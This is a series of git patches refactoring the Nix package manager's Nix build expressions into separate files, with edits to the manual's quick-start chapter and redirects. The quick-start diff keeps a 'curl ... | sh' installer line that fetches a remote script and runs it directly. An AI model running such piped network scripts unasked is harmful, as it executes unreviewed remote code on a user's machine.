@@ -34,7 +34,14 @@ "x86_64-freebsd13" "x86_64-netbsd" ]; - stdenvs = [ "gccStdenv" "clangStdenv" "clang11Stdenv" "stdenv" "libcxxStdenv" "ccacheStdenv" ]; + stdenvs = [ + "ccacheStdenv" + "clang11Stdenv" + "clangStdenv" + "gccStdenv" + "libcxxStdenv" + "stdenv" + ]; forAllSystems = lib.genAttrs systems; @@ -326,82 +333,18 @@ ''; }; - binaryTarball = nix: pkgs: - let - inherit (pkgs) buildPackages; - inherit (pkgs) cacert; - installerClosureInfo = buildPackages.closureInfo { rootPaths = [ nix cacert ]; }; - in - - buildPackages.runCommand "nix-binary-tarball-${version}" - { #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; - meta.description = "Distribution-independent Nix bootstrap binaries for ${pkgs.system}"; - } - '' - cp ${installerClosureInfo}/registration $TMPDIR/reginfo - cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh - substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ - --subst-var-by nix ${nix} \ - 
--subst-var-by cacert ${cacert} - - substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - - if type -p shellcheck; then - # SC1090: Don't worry about not being able to find - # $nix/etc/profile.d/nix.sh - shellcheck --exclude SC1090 $TMPDIR/install - shellcheck $TMPDIR/create-darwin-volume.sh - shellcheck $TMPDIR/install-darwin-multi-user.sh - shellcheck $TMPDIR/install-systemd-multi-user.sh - - # SC1091: Don't panic about not being able to source - # /etc/profile - # SC2002: Ignore "useless cat" "error", when loading - # .reginfo, as the cat is a much cleaner - # implementation, even though it is "useless" - # SC2116: Allow ROOT_HOME=$(echo ~root) for resolving - # root's home directory - shellcheck --external-sources \ - --exclude SC1091,SC2002,SC2116 $TMPDIR/install-multi-user - fi - - chmod +x $TMPDIR/install - chmod +x $TMPDIR/create-darwin-volume.sh - chmod +x $TMPDIR/install-darwin-multi-user.sh - chmod +x $TMPDIR/install-systemd-multi-user.sh - chmod +x $TMPDIR/install-multi-user - dir=nix-${version}-${pkgs.system} - fn=$out/$dir.tar.xz - mkdir -p $out/nix-support - echo "file binary-dist $fn" >> $out/nix-support/hydra-build-products - tar cvfJ $fn \ - --owner=0 --group=0 --mode=u+rw,uga+r \ - --mtime='1970-01-01' \ - --absolute-names \ - --hard-dereference \ - --transform "s,$TMPDIR/install,$dir/install," \ - --transform "s,$TMPDIR/create-darwin-volume.sh,$dir/create-darwin-volume.sh," \ - --transform "s,$TMPDIR/reginfo,$dir/.reginfo," \ - --transform "s,$NIX_STORE,$dir/store,S" \ - $TMPDIR/install \ - $TMPDIR/create-darwin-volume.sh \ - 
$TMPDIR/install-darwin-multi-user.sh \ - $TMPDIR/install-systemd-multi-user.sh \ - $TMPDIR/install-multi-user \ - $TMPDIR/reginfo \ - $(cat ${installerClosureInfo}/store-paths) - ''; + binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { + inherit nix; + }; overlayFor = getStdenv: final: prev: - let currentStdenv = getStdenv final; in + let + stdenv = getStdenv final; + + lowdown-nix = final.callPackage ./lowdown.nix { + inherit lowdown-src stdenv; + }; + in { nixStable = prev.nix; @@ -409,129 +352,70 @@ nixUnstable = prev.nixUnstable; nix = - with final; - with commonDeps { - inherit pkgs; - inherit (currentStdenv.hostPlatform) isStatic; - }; - let - canRunInstalled = currentStdenv.buildPlatform.canExecute currentStdenv.hostPlatform; - in currentStdenv.mkDerivation (finalAttrs: { - name = "nix-${version}"; - inherit version; + let + officialRelease = false; + versionSuffix = + if officialRelease + then "" + else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - src = nixSrc; - VERSION_SUFFIX = versionSuffix; + sh = final.busybox-sandbox-shell or (final.busybox.override { + useMusl = true; + enableStatic = true; + enableMinimal = true; + extraConfig = '' + CONFIG_FEATURE_FANCY_ECHO y + CONFIG_FEATURE_SH_MATH y + CONFIG_FEATURE_SH_MATH_64 y - outputs = [ "out" "dev" "doc" ] - ++ lib.optional (currentStdenv.hostPlatform != currentStdenv.buildPlatform) "check"; + CONFIG_ASH y + CONFIG_ASH_OPTIMIZE_FOR_SIZE y - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps - # There have been issues building these dependencies - ++ lib.optionals (currentStdenv.hostPlatform == currentStdenv.buildPlatform) awsDeps - ++ lib.optionals finalAttrs.doCheck checkDeps; + CONFIG_ASH_ALIAS y + CONFIG_ASH_BASH_COMPAT y + CONFIG_ASH_CMDCMD y + CONFIG_ASH_ECHO y + CONFIG_ASH_GETOPTS y + CONFIG_ASH_INTERNAL_GLOB y + CONFIG_ASH_JOB_CONTROL y + CONFIG_ASH_PRINTF y + CONFIG_ASH_TEST y + ''; + }); - 
propagatedBuildInputs = propagatedDeps; + boehmgc = (final.boehmgc.override { + enableLargeConfig = true; + }).overrideAttrs(o: { + patches = (o.patches or []) ++ [ + ./boehmgc-coroutine-sp-fallback.diff - disallowedReferences = [ boost-nix ]; + # https://github.com/ivmai/bdwgc/pull/586 + ./boehmgc-traceable_allocator-public.diff + ]; + }); - preConfigure = lib.optionalString (! currentStdenv.hostPlatform.isStatic) - '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost-nix}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString currentStdenv.hostPlatform.isLinux '' - chmod u+w $out/lib/*.so.* - patchelf --set-rpath $out/lib:${currentStdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString currentStdenv.hostPlatform.isDarwin '' - for LIB in $out/lib/*.dylib; do - chmod u+w $LIB - install_name_tool -id $LIB $LIB - install_name_tool -delete_rpath ${boost-nix}/lib/ $LIB || true - done - install_name_tool -change ${boost-nix}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; - - configureFlags = configureFlags ++ - [ "--sysconfdir=/etc" ] ++ - lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" ++ - [ (lib.enableFeature finalAttrs.doCheck "tests") ] ++ - lib.optionals finalAttrs.doCheck testConfigureFlags ++ - lib.optional (!canRunInstalled) "--disable-doc-gen"; - - enableParallelBuilding = true; - - makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; - - doCheck = true; - - installFlags = "sysconfdir=$(out)/etc"; - - postInstall = '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - ${lib.optionalString currentStdenv.hostPlatform.isStatic '' - mkdir -p $out/nix-support - echo "file binary-dist $out/bin/nix" >> 
$out/nix-support/hydra-build-products - ''} - ${lib.optionalString currentStdenv.isDarwin '' - install_name_tool \ - -change ${boost-nix}/lib/libboost_context.dylib \ - $out/lib/libboost_context.dylib \ - $out/lib/libnixutil.dylib - install_name_tool \ - -change ${boost-nix}/lib/libboost_regex.dylib \ - $out/lib/libboost_regex.dylib \ - $out/lib/libnixexpr.dylib - ''} - ''; - - doInstallCheck = finalAttrs.doCheck; - installCheckFlags = "sysconfdir=$(out)/etc"; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - - separateDebugInfo = !currentStdenv.hostPlatform.isStatic; - - strictDeps = true; - - hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - - passthru.perl-bindings = final.callPackage ./perl { - inherit fileset; - stdenv = currentStdenv; + in final.callPackage ./package.nix { + inherit + boehmgc + fileset + sh + stdenv + versionSuffix + ; + boost = final.boost.override { enableIcu = false; }; + libgit2 = final.libgit2.overrideAttrs (attrs: { + src = libgit2; + version = libgit2.lastModifiedDate; + cmakeFlags = attrs.cmakeFlags or [] + ++ [ "-DUSE_SSH=exec" ]; + }); + lowdown = lowdown-nix; + officialRelease = false; }; - meta.platforms = lib.platforms.unix; - meta.mainProgram = "nix"; - }); - - boost-nix = final.boost.override { - enableIcu = false; + inherit lowdown-nix; }; - lowdown-nix = with final; currentStdenv.mkDerivation rec { - name = "lowdown-0.9.0"; - - src = lowdown-src; - - outputs = [ "out" "bin" "dev" ]; - - nativeBuildInputs = [ buildPackages.which ]; - - configurePhase = '' - ${if (currentStdenv.isDarwin && currentStdenv.isAarch64) then "echo \"HAVE_SANDBOX_INIT=false\" > configure.local" else ""} - ./configure \ - PREFIX=${placeholder "dev"} \ - BINDIR=${placeholder "bin"}/bin - ''; - }; - }; - in { # A Nixpkgs overlay that overrides the 'nix' and # 'nix.perl-bindings' packages. 
diff --git a/lowdown.nix b/lowdown.nix new file mode 100644 index 000000000..5f469fad5 --- /dev/null +++ b/lowdown.nix @@ -0,0 +1,22 @@ +{ lib +, stdenv +, which +, lowdown-src +}: + +stdenv.mkDerivation rec { + name = "lowdown-0.9.0"; + + src = lowdown-src; + + outputs = [ "out" "bin" "dev" ]; + + nativeBuildInputs = [ which ]; + + configurePhase = '' + ${lib.optionalString (stdenv.isDarwin && stdenv.isAarch64) "echo \"HAVE_SANDBOX_INIT=false\" > configure.local"} + ./configure \ + PREFIX=${placeholder "dev"} \ + BINDIR=${placeholder "bin"}/bin + ''; +} diff --git a/package.nix b/package.nix new file mode 100644 index 000000000..ae075acf7 --- /dev/null +++ b/package.nix @@ -0,0 +1,239 @@ +{ lib +, callPackage +, stdenv +, versionSuffix ? "" +, officialRelease ? false +, buildUnreleasedNotes ? false +, autoconf-archive +, autoreconfHook +, aws-sdk-cpp +, boehmgc +, nlohmann_json +, bison +, boost +, brotli +, bzip2 +, changelog-d +, curl +, editline +, fileset +, flex +, git +, gtest +, jq +, libarchive +, libcpuid +, libgit2 +, libseccomp +, libsodium +, lowdown +, mdbook +, mdbook-linkcheck +, mercurial +, openssh +, openssl +, pkg-config +, rapidcheck +, sh +, sqlite +, util-linux +, xz +}: + +let + + version = lib.fileContents ./.version + versionSuffix; + + inherit (stdenv.hostPlatform) isStatic; + + canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; +in + +stdenv.mkDerivation (finalAttrs: { + name = "nix-${version}"; + inherit version; + + src = + let + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; + configureFiles = fileset.unions [ + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. 
+ ./README.md + ]; + + topLevelBuildFiles = fileset.unions [ + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + ]; + + functionalTestFiles = fileset.unions [ + ./tests/functional + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) + ]; + + in + fileset.toSource { + root = ./.; + fileset = fileset.intersect baseFiles (fileset.unions [ + configureFiles + topLevelBuildFiles + ./boehmgc-coroutine-sp-fallback.diff + ./doc + ./misc + ./precompiled-headers.h + ./src + ./unit-test-data + ./COPYING + ./scripts/local.mk + functionalTestFiles + ]); + }; + + VERSION_SUFFIX = versionSuffix; + + outputs = [ "out" "dev" "doc" ] + ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; + + nativeBuildInputs = [ + bison + flex + (lib.getBin lowdown) + mdbook + mdbook-linkcheck + autoconf-archive + autoreconfHook + pkg-config + + # Tests + git + mercurial # FIXME: remove? only needed for tests + jq # Also for custom mdBook preprocessor. + openssh # only needed for tests (ssh-keygen) + ] + ++ lib.optional stdenv.hostPlatform.isLinux util-linux + # Official releases don't have rl-next, so we don't need to compile a changelog + ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; + + buildInputs = [ + boost + brotli + bzip2 + curl + editline + libarchive + libgit2 + libsodium + lowdown + openssl + sqlite + xz + ] + ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid + # There have been issues building these dependencies + ++ lib.optionals (stdenv.hostPlatform == stdenv.buildPlatform) (lib.optional (stdenv.isLinux || stdenv.isDarwin) + (aws-sdk-cpp.override { + apis = ["s3" "transfer"]; + customMemoryManagement = false; + })) + ++ lib.optionals finalAttrs.doCheck ([ + gtest + rapidcheck + ]); + + propagatedBuildInputs = [ + boehmgc + nlohmann_json + ]; + + disallowedReferences = [ boost ]; + + preConfigure = lib.optionalString (! 
stdenv.hostPlatform.isStatic) + '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + ${lib.optionalString stdenv.hostPlatform.isLinux '' + chmod u+w $out/lib/*.so.* + patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* + ''} + ${lib.optionalString stdenv.hostPlatform.isDarwin '' + for LIB in $out/lib/*.dylib; do + chmod u+w $LIB + install_name_tool -id $LIB $LIB + install_name_tool -delete_rpath ${boost}/lib/ $LIB || true + done + install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib + ''} + ''; + + configureFlags = + lib.optionals stdenv.isLinux [ + "--with-boost=${boost}/lib" + "--with-sandbox-shell=${sh}/bin/busybox" + ] + ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ + "LDFLAGS=-fuse-ld=gold" + ] + ++ [ "--sysconfdir=/etc" ] + ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" + ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] + ++ lib.optionals finalAttrs.doCheck ([ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] + ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ]) + ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; + + enableParallelBuilding = true; + + makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; + + doCheck = true; + + installFlags = "sysconfdir=$(out)/etc"; + + postInstall = '' + mkdir -p $doc/nix-support + echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products + ${lib.optionalString stdenv.hostPlatform.isStatic '' + mkdir -p 
$out/nix-support + echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products + ''} + ${lib.optionalString stdenv.isDarwin '' + install_name_tool \ + -change ${boost}/lib/libboost_context.dylib \ + $out/lib/libboost_context.dylib \ + $out/lib/libnixutil.dylib + install_name_tool \ + -change ${boost}/lib/libboost_regex.dylib \ + $out/lib/libboost_regex.dylib \ + $out/lib/libnixexpr.dylib + ''} + ''; + + doInstallCheck = finalAttrs.doCheck; + installCheckFlags = "sysconfdir=$(out)/etc"; + installCheckTarget = "installcheck"; # work around buggy detection in stdenv + + separateDebugInfo = !stdenv.hostPlatform.isStatic; + + strictDeps = true; + + hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; + + passthru.perl-bindings = callPackage ./perl { + inherit fileset stdenv; + }; + + meta.platforms = lib.platforms.unix; + meta.mainProgram = "nix"; +}) From c64190e65048547712fcf7a0ae09fbfd0a709474 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:49:02 +0000 Subject: [PATCH 017/654] Run statix --- flake.nix | 6 +++--- package.nix | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index a1fc1cd1c..e32a84ae5 100644 --- a/flake.nix +++ b/flake.nix @@ -7,7 +7,7 @@ inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2 }: + outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2, ... 
}: let inherit (nixpkgs) lib; @@ -183,7 +183,7 @@ "--enable-internal-api-docs" ]; - changelog-d = pkgs.buildPackages.changelog-d; + inherit (pkgs.buildPackages) changelog-d; nativeBuildDeps = [ @@ -349,7 +349,7 @@ nixStable = prev.nix; # Forward from the previous stage as we don’t want it to pick the lowdown override - nixUnstable = prev.nixUnstable; + inherit (prev) nixUnstable; nix = let diff --git a/package.nix b/package.nix index ae075acf7..8d62120fb 100644 --- a/package.nix +++ b/package.nix @@ -141,10 +141,10 @@ stdenv.mkDerivation (finalAttrs: { apis = ["s3" "transfer"]; customMemoryManagement = false; })) - ++ lib.optionals finalAttrs.doCheck ([ + ++ lib.optionals finalAttrs.doCheck [ gtest rapidcheck - ]); + ]; propagatedBuildInputs = [ boehmgc From f55ee7cf7753caee7a27052fab679d8c8fe27cc4 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:53:07 +0000 Subject: [PATCH 018/654] little refactoring --- flake.nix | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index e32a84ae5..544a07ba6 100644 --- a/flake.nix +++ b/flake.nix @@ -459,8 +459,21 @@ # to https://nixos.org/nix/install. It downloads the binary # tarball for the user's system and calls the second half of the # installation script. 
- installerScript = installScriptFor [ "x86_64-linux" "i686-linux" "aarch64-linux" "x86_64-darwin" "aarch64-darwin" "armv6l-linux" "armv7l-linux" ]; - installerScriptForGHA = installScriptFor [ "x86_64-linux" "x86_64-darwin" "armv6l-linux" "armv7l-linux"]; + installerScript = installScriptFor [ + "aarch64-linux" + "armv6l-linux" + "armv7l-linux" + "i686-linux" + "x86_64-linux" + "aarch64-darwin" + "x86_64-darwin" + ]; + installerScriptForGHA = installScriptFor [ + "armv6l-linux" + "armv7l-linux" + "x86_64-linux" + "x86_64-darwin" + ]; # docker image with Nix inside dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); From 02d9cf2d303e4e7e283dba2f3181f3e40843c354 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 1 Dec 2023 00:41:19 +0100 Subject: [PATCH 019/654] shorten the quick start chapter this focuses on `nix-shell -p` and refers to search.nixos.org for package search, which is currently the easiest and most effective way to find program names. --- doc/manual/src/quick-start.md | 87 +++++++---------------------------- 1 file changed, 16 insertions(+), 71 deletions(-) diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md index 5f54abbde..04a0b7c96 100644 --- a/doc/manual/src/quick-start.md +++ b/doc/manual/src/quick-start.md @@ -1,10 +1,9 @@ # Quick Start -This chapter is for impatient people who don't like reading -documentation. For more in-depth information you are kindly referred -to subsequent chapters. +This chapter is for impatient people who don't like reading documentation. +For more in-depth information you are kindly referred to subsequent chapters. -1. Install Nix by running the following: +1. Install Nix: ```console $ curl -L https://nixos.org/nix/install | sh @@ -13,87 +12,33 @@ to subsequent chapters. The install script will use `sudo`, so make sure you have sufficient rights. On Linux, `--daemon` can be omitted for a single-user install. 
- For other installation methods, see [here](installation/index.md). + For other installation methods, see the detailed [installation instructions](installation/index.md). -1. See what installable packages are currently available in the - channel: +1. Run software without installing it permanently: ```console - $ nix-env --query --available --attr-path - nixpkgs.docbook_xml_dtd_43 docbook-xml-4.3 - nixpkgs.docbook_xml_dtd_45 docbook-xml-4.5 - nixpkgs.firefox firefox-33.0.2 - nixpkgs.hello hello-2.9 - nixpkgs.libxslt libxslt-1.1.28 - … + $ nix-shell --packages cowsay lolcat ``` -1. Install some packages from the channel: + This downloads the specified packages with all their dependencies, and drops you into a Bash shell where the commands provided by those packages are present. + This will not affect your normal environment: ```console - $ nix-env --install --attr nixpkgs.hello + [nix-shell:~]$ cowsay Hello, Nix! | lolcat ``` - This should download pre-built packages; it should not build them - locally (if it does, something went wrong). - -1. Test that they work: + Exiting the shell will make the programs disappear again: ```console - $ which hello - /home/eelco/.nix-profile/bin/hello - $ hello - Hello, world! - ``` - -1. Uninstall a package: - - ```console - $ nix-env --uninstall hello - ``` - -1. You can also test a package without installing it: - - ```console - $ nix-shell --packages hello - ``` - - This builds or downloads GNU Hello and its dependencies, then drops - you into a Bash shell where the `hello` command is present, all - without affecting your normal environment: - - ```console - [nix-shell:~]$ hello - Hello, world! - [nix-shell:~]$ exit - - $ hello - hello: command not found + $ lolcat + lolcat: command not found ``` -1. To keep up-to-date with the channel, do: +1. Search for more packages on to try them out. + +1. 
Free up storage space: ```console - $ nix-channel --update nixpkgs - $ nix-env --upgrade '*' - ``` - - The latter command will upgrade each installed package for which - there is a “newer” version (as determined by comparing the version - numbers). - -1. If you're unhappy with the result of a `nix-env` action (e.g., an - upgraded package turned out not to work properly), you can go back: - - ```console - $ nix-env --rollback - ``` - -1. You should periodically run the Nix garbage collector to get rid of - unused packages, since uninstalls or upgrades don't actually delete - them: - - ```console - $ nix-collect-garbage --delete-old + $ nix-collect-garbage ``` From d5e934fb73496a2509755be5945a8bcf1730d59d Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 1 Dec 2023 01:54:48 +0100 Subject: [PATCH 020/654] add redirect to new store page --- doc/manual/_redirects | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/_redirects b/doc/manual/_redirects index 2038671d7..62c693c97 100644 --- a/doc/manual/_redirects +++ b/doc/manual/_redirects @@ -31,9 +31,9 @@ /installation/installation /installation 301! /package-management/basic-package-mgmt /command-ref/nix-env 301! -/package-management/channels* /command-ref/nix-channel 301! +/package-management/channels /command-ref/nix-channel 301! /package-management/package-management /package-management 301! -/package-management/s3-substituter* /command-ref/new-cli/nix3-help-stores#s3-binary-cache-store 301! +/package-management/s3-substituter /store/types/s3-binary-cache-store 301! /protocols/protocols /protocols 301! 
From eff9b12bc296213c3ba824e90869bcafc4103e1c Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Fri, 1 Dec 2023 11:25:22 +0000 Subject: [PATCH 021/654] Further changes --- binary-tarball.nix | 6 ++- coverage.nix | 35 ++++++++++++++ flake.nix | 115 ++++++++++----------------------------------- package.nix | 88 +++++++++++++++++----------------- 4 files changed, 108 insertions(+), 136 deletions(-) create mode 100644 coverage.nix diff --git a/binary-tarball.nix b/binary-tarball.nix index 1fa185519..0053abbca 100644 --- a/binary-tarball.nix +++ b/binary-tarball.nix @@ -1,8 +1,8 @@ { runCommand -, version , system -, nix +, buildPackages , cacert +, nix }: let @@ -11,6 +11,8 @@ let rootPaths = [ nix cacert ]; }; + inherit (nix) version; + env = { meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; }; diff --git a/coverage.nix b/coverage.nix new file mode 100644 index 000000000..2390ef52d --- /dev/null +++ b/coverage.nix @@ -0,0 +1,35 @@ +{ lib +, releaseTools +, nix +, stdenv +}: + +let + inherit (nix) version; + +in + +releaseTools.coverageAnalysis { + name = "nix-coverage-${version}"; + + inherit (nix) + src + configureFlags + nativeBuildInputs + buildInputs + #checkInputs + ; + + enableParallelBuilding = true; + + dontInstall = false; + + doInstallCheck = true; + installCheckTarget = "installcheck"; # work around buggy detection in stdenv + + lcovFilter = [ "*/boost/*" "*-tab.*" ]; + + hardeningDisable = ["fortify"]; + + NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; +} diff --git a/flake.nix b/flake.nix index 544a07ba6..c0841a76d 100644 --- a/flake.nix +++ b/flake.nix @@ -479,60 +479,25 @@ dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); # Line coverage analysis. 
- coverage = - with nixpkgsFor.x86_64-linux.native; - with commonDeps { inherit pkgs; }; - - releaseTools.coverageAnalysis { - name = "nix-coverage-${version}"; - - src = nixSrc; - - configureFlags = testConfigureFlags; - - enableParallelBuilding = true; - - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ propagatedDeps ++ awsDeps ++ checkDeps; - - dontInstall = false; - - doInstallCheck = true; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - - lcovFilter = [ "*/boost/*" "*-tab.*" ]; - - hardeningDisable = ["fortify"]; - - NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; - }; + coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = - with nixpkgsFor.x86_64-linux.native; - with commonDeps { inherit pkgs; }; + internal-api-docs = nixpkgsFor.x86_64-linux.native.nix.overrideAttrs (old: { + pname = "nix-internal-api-docs"; - stdenv.mkDerivation { - pname = "nix-internal-api-docs"; - inherit version; + configureFlags = old.configureFlags ++ [ "--enable-internal-api-docs" ]; + nativeBuildInputs = old.nativeBuildInputs ++ [ nixpkgsFor.x86_64-linux.native.doxygen ]; - src = nixSrc; + dontBuild = true; + doCheck = false; - configureFlags = testConfigureFlags ++ internalApiDocsConfigureFlags; + installTargets = [ "internal-api-html" ]; - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ propagatedDeps - ++ awsDeps ++ checkDeps ++ internalApiDocsDeps; - - dontBuild = true; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; - }; + postInstall = '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + ''; + }); # System tests. 
tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { @@ -540,7 +505,9 @@ # Make sure that nix-env still produces the exact same result # on a particular version of Nixpkgs. evalNixpkgs = - with nixpkgsFor.x86_64-linux.native; + let + inherit (nixpkgsFor.x86_64-linux.native) runCommand nix nixpkgs-regression; + in runCommand "eval-nixos" { buildInputs = [ nix ]; } '' type -p nix-env @@ -627,47 +594,17 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: - let - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; - in - with commonDeps { inherit pkgs; }; - stdenv.mkDerivation { - name = "nix"; + makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (_: { + installFlags = "sysconfdir=$(out)/etc"; + shellHook = '' + PATH=$prefix/bin:$PATH + unset PYTHONPATH + export MANPATH=$out/share/man:$MANPATH - outputs = [ "out" "dev" "doc" ] - ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; - - nativeBuildInputs = nativeBuildDeps - ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear - ++ lib.optional - (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) - pkgs.buildPackages.clang-tools - # We want changelog-d in the shell even if the current build doesn't need it - ++ lib.optional (officialRelease || ! buildUnreleasedNotes) changelog-d - ; - - buildInputs = buildDeps ++ propagatedDeps - ++ awsDeps ++ checkDeps ++ internalApiDocsDeps; - - configureFlags = configureFlags - ++ testConfigureFlags ++ internalApiDocsConfigureFlags - ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; - - enableParallelBuilding = true; - - installFlags = "sysconfdir=$(out)/etc"; - - shellHook = - '' - PATH=$prefix/bin:$PATH - unset PYTHONPATH - export MANPATH=$out/share/man:$MANPATH - - # Make bash completion work. - XDG_DATA_DIRS+=:$out/share - ''; - }; + # Make bash completion work. 
+ XDG_DATA_DIRS+=:$out/share + ''; + }); in forAllSystems (system: let diff --git a/package.nix b/package.nix index 8d62120fb..bed77ba3b 100644 --- a/package.nix +++ b/package.nix @@ -41,16 +41,12 @@ }: let - version = lib.fileContents ./.version + versionSuffix; - - inherit (stdenv.hostPlatform) isStatic; - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; in stdenv.mkDerivation (finalAttrs: { - name = "nix-${version}"; + pname = "nix"; inherit version; src = @@ -103,17 +99,12 @@ stdenv.mkDerivation (finalAttrs: { bison flex (lib.getBin lowdown) + jq # Also for custom mdBook preprocessor. mdbook mdbook-linkcheck autoconf-archive autoreconfHook pkg-config - - # Tests - git - mercurial # FIXME: remove? only needed for tests - jq # Also for custom mdBook preprocessor. - openssh # only needed for tests (ssh-keygen) ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux # Official releases don't have rl-next, so we don't need to compile a changelog @@ -133,19 +124,29 @@ stdenv.mkDerivation (finalAttrs: { sqlite xz ] - ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid # There have been issues building these dependencies - ++ lib.optionals (stdenv.hostPlatform == stdenv.buildPlatform) (lib.optional (stdenv.isLinux || stdenv.isDarwin) + ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && (stdenv.isLinux || stdenv.isDarwin)) (aws-sdk-cpp.override { apis = ["s3" "transfer"]; customMemoryManagement = false; - })) - ++ lib.optionals finalAttrs.doCheck [ + }) + ; + + doCheck = true; + + checkInputs = [ gtest rapidcheck ]; + nativeCheckInputs = [ + git + mercurial # FIXME: remove? only needed for tests + openssh # only needed for tests (ssh-keygen) + ]; + propagatedBuildInputs = [ boehmgc nlohmann_json @@ -153,52 +154,49 @@ stdenv.mkDerivation (finalAttrs: { disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (! 
